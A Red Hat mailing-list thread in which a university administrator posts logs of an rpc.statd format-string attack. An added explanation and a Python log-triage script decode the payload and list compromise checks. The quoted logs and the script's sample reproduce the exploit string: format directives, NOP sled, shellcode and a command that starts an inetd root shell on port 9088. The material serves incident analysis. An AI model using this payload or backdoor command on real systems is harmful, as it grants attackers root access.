Uhhh, never mind, it IS on CERT as an rpc.statd and wu-ftpd exploit. Now to
see if they got in...
Gavin Durman --- Xavier University LAN System Administrator
=================================================
[EMAIL PROTECTED] ICQ: 20277424 http://durman.xu.edu
----------
>From: "Gavin" <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Subject: anyone seen this attack?
>Date: Mon, Nov 6, 2000, 12:56 PM
>
> Has anyone seen this type of attack before? I'm not sure just where to start
> looking other than CERT, but is it a DoS, or an exploit of a particular
> OS/package? Thanks!
>
> Here you go...
>
> Active System Attack Alerts
> =-=-=-=-=-=-=-=-=-=-=-=-=-=
> Nov 3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
>
> Security Violations
> =-=-=-=-=-=-=-=-=-=
> Nov 3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
>
> Unusual System Events
> =-=-=-=-=-=-=-=-=-=-=
> Nov 3 18:01:00 www CROND[6057]: (root) CMD (run-parts /etc/cron.hourly)
> Nov 3 18:10:00 www CROND[6059]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 18:20:00 www CROND[6061]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 18:30:00 www CROND[6063]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 18:40:00 www CROND[6065]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 23:45:03 www rpc.statd[366]: SM_MON request for hostname containing
> '/': ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %08x %08x %08x
> %0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20ëK^\211v¬\203î
>
> \215^(\203Æ \211^°\203î \215^.\203Æ \203Ã \203ë#\211^´1À\203î \210F'
> \210F*\203Æ \210F«\211F¸°+, \211ó\215N¬\215V¸Í\2001Û\211Ø@Í\200è°ÿÿÿ/bin/sh
> -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd
> /tmp/m;
> Nov 3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
> Nov 3 23:45:03 www rpc.statd[366]: STAT_FAIL to localhost for SM_MON of
> ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x %08x
> %08x %08x %08x %08x %08x %08x %08x
> %0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20ëK^\211v¬\203î
>
> \215^(\203Æ \211^°\203î \215^.\203Æ \203Ã \203ë#\211^´1À\203î \210F'
> \210F*\203Æ \210F«\211F¸°+, \211ó\215N¬\215V¸Í\2001Û\211Ø@Í\200è°ÿÿÿ/bin/sh
> -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd
> /tmp/m;
> Nov 3 18:50:00 www CROND[6067]: (root) CMD ( /sbin/rmmod -as)
> Nov 3 18:50:41 www rhnsd[6068]: running program /usr/sbin/rhn_check
> Nov 3 18:50:43 www rhnsd[766]: command returned:
> Nov 3 19:00:00 www CROND[6071]: (root) CMD (/bin/sh
> /usr/local/etc/logcheck.sh)
> Nov 3 19:00:00 www CROND[6072]: (root) CMD ( /sbin/rmmod -as)
>
>
> Gavin Durman --- Xavier University LAN System Administrator
> =================================================
> [EMAIL PROTECTED] ICQ: 20277424 http://durman.xu.edu
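The hostname in the quoted SM_MON line is a format-string payload, not a DoS: the leading bytes are the addresses to overwrite (^D÷ÿ¿ is 0xbffff704 as a little-endian dword, then 0xbffff705, 0xbffff706, 0xbffff707, each repeated), the fourteen %08x directives pop stack words until those addresses are reached, the four %0NNNx%n pairs each write the running character count into one of the four consecutive addresses, and the \220 run is a NOP sled into shellcode that executes the trailing /bin/sh -c command, which appends an inetd line to /tmp/m and starts a second inetd on it so that port 9088 hands out a root shell. The analyser below is an added example for this thread, not code from the original post or from Red Hat. It works on the syslog rendering shown in the post (control bytes as ^X, high bytes as \ooo octal or raw Latin-1), which is an assumption; the SAMPLE_LOG is constructed from the post's log with the wrapped lines joined and the sled and shellcode shortened. The triage commands it emits are the "did they get in" checks for the IOCs visible in the logged command.

```python
"""rpc.statd format-string log triage. Added example, not code from the
original thread or from Red Hat."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample modelled on the post's log (wrapped lines joined, NOP sled
# and shellcode shortened). Assumed syslog rendering, as in the post: control
# bytes as ^X, bytes >= 0x80 as \ooo octal or as raw Latin-1 characters.
SAMPLE_LOG = r"""Nov 3 18:01:00 www CROND[6057]: (root) CMD (run-parts /etc/cron.hourly)
Nov 3 23:45:03 www rpc.statd[366]: POSSIBLE SPOOF/ATTACK ATTEMPT!
Nov 3 23:45:03 www rpc.statd[366]: SM_MON request for hostname containing '/': ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %0242x%n%055x%n%012x%n%0192x%n\220\220\220\220\220\220\220\220\220\220ëK^\211v¬\203î /bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd /tmp/m;
Nov 3 18:50:41 www rhnsd[6068]: running program /usr/sbin/rhn_check
"""

STATD_RE = re.compile(r"rpc\.statd\[(\d+)\]: SM_MON request for hostname containing '/': (.*)$")
DIRECTIVE_RE = re.compile(r"%(0?\d*)([xn])")


@dataclass
class StatdFinding:
    pid: int
    targets: List[int]         # addresses the %n writes land on (little-endian dwords)
    pops: int                  # %08x directives that walk the stack up to those addresses
    write_paddings: List[int]  # width of the %x that sets the count before each %n
    nop_sled: int              # \220 (0x90) bytes ahead of the shellcode
    command: Optional[str]     # shell command appended after the shellcode
    backdoor_port: Optional[int]
    inetd_config: Optional[str]


def decode_escapes(text: str) -> bytes:
    r"""Undo the syslog rendering: ^X -> control byte, \ooo -> octal byte,
    anything else -> its Latin-1 byte value."""
    out = bytearray()
    for m in re.finditer(r"\^(.)|\\([0-7]{3})|(.)", text, re.S):
        if m.group(1):
            out.append(ord(m.group(1)) ^ 0x40)
        elif m.group(2):
            out.append(int(m.group(2), 8))
        else:
            out.append(ord(m.group(3)) & 0xFF)
    return bytes(out)


def target_addresses(prefix: str) -> List[int]:
    """The hostname opens with the addresses to overwrite, repeated so each is
    reachable as a %n argument; four consecutive byte addresses means the low
    byte of each %n count lands in one byte of the overwritten dword."""
    raw = decode_escapes(prefix)
    addrs: List[int] = []
    for i in range(0, len(raw) - 3, 4):
        a = int.from_bytes(raw[i:i + 4], "little")
        if a not in addrs:
            addrs.append(a)
    return addrs


def analyze_payload(pid: int, payload: str) -> StatdFinding:
    prefix = payload.split("%", 1)[0]
    directives = DIRECTIVE_RE.findall(payload)
    paddings: List[int] = []
    prev: Optional[int] = None
    for width, conv in directives:
        if conv == "x":
            prev = int(width) if width else 0
        elif prev is not None:  # %n writes the running character count
            paddings.append(prev)
            prev = None
    total_x = sum(1 for _, c in directives if c == "x")
    cmd_m = re.search(r"(/bin/sh -c .*)$", payload)
    command = cmd_m.group(1) if cmd_m else None
    port = cfg = None
    if command:
        p = re.search(r"(\d+)\s+stream\s+tcp\s+nowait\s+\S+\s+\S+", command)
        c = re.search(r">>\s*(\S+?);", command)
        port = int(p.group(1)) if p else None
        cfg = c.group(1) if c else None
    sled = payload.count(r"\220") + payload.count("\x90")
    return StatdFinding(pid, target_addresses(prefix), total_x - len(paddings),
                        paddings, sled, command, port, cfg)


def scan_log(text: str) -> List[StatdFinding]:
    findings = []
    for line in text.splitlines():
        m = STATD_RE.search(line)
        if m:
            findings.append(analyze_payload(int(m.group(1)), m.group(2)))
    return findings


def iocs(f: StatdFinding) -> List[Tuple[str, object]]:
    """Host artefacts implied by the logged command: the listener, the dropped
    inetd config, and the second inetd that reads it."""
    out: List[Tuple[str, object]] = []
    if f.backdoor_port is not None:
        out.append(("listening_port", f.backdoor_port))
    if f.inetd_config:
        out.append(("file", f.inetd_config))
        out.append(("process", f"inetd {f.inetd_config}"))
    return out


def triage_commands(f: StatdFinding) -> List[str]:
    """Checks to run on the suspected host; a hit means the shellcode ran as root."""
    cmds = []
    for kind, value in iocs(f):
        if kind == "listening_port":
            cmds.append(f"netstat -tlnp | grep ':{value} '")
        elif kind == "file":
            cmds.append(f"ls -l {value}")
        elif kind == "process":
            cmds.append(f"ps axww | grep '{value}'")
    return cmds


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"rpc.statd[{f.pid}]: {len(f.write_paddings)} %n writes to "
              f"{[hex(a) for a in f.targets]}, {f.pops} stack pops, "
              f"{f.nop_sled}-byte NOP sled")
        print("command:", f.command)
        for c in triage_commands(f):
            print("  check:", c)
```

Note that the padding widths (242, 55, 12, 192) only give the increments between the four writes; the absolute values written depend on how many characters syslog had already emitted for that message before the first padded %x, which the log alone does not show, so the script reports the increments and the targets rather than guessing the final dword.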
_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list